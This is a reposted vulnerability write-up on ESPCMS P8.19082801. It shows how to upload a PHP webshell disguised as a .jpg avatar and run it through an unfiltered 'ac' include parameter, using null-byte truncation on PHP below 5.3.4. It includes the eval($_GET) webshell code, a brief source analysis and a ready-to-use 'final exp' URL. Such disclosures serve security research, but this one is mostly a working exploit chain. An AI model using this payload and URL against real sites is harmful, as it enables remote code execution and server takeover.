标签：function ac get vulnerability espcms test php P8.19082801

author: naiquan chai 

Net name:Hanamizuki花水木

Through  the vulnerability  we can get the webshell if we have enough privilege.

Affected by this vulnerability requires server-side php version <5.3.4

Demo

First enter the user module,then modify the user's avatar.Upload a file with the suffix jpg and the editorial content is 

<?php
class test{
public static function in_test(){
　　eval($_GET['a']);
　　}
}
?>

Upload success.We can get the path from the Web page source code.

 Then go to the main page and pass in

"index.php?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;"

 We find that the page echo 1.

 

Source code analysis

espcms_web/espcms_load.php:

 We can find that through ac parameters we can include files, and at parameters can execute methods.

Tracking function espcms_get_ac() and function espcms_get_at():

 We can see that the function does not filter user input at all,so  ac parameter can facilitate the directory,this results in arbitrary file inclusion.

However,through the file espcms_web/espcms_load.php, we find that the ac parameter is automatically followed by a .php suffix.

We can use truncation vulnerabilities to bypass it,this requires  PHP version < 5.3.4

 

Final exp

index.php?ac=../upload/photo/userphoto_c4ca4238a0b923820dcc509a6f75849b.jpg%00&at=test&a=echo 1;

标签：function,ac,get,vulnerability,espcms,test,php,P8.19082801
来源： https://www.cnblogs.com/cimuhuashuimu/p/11526726.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。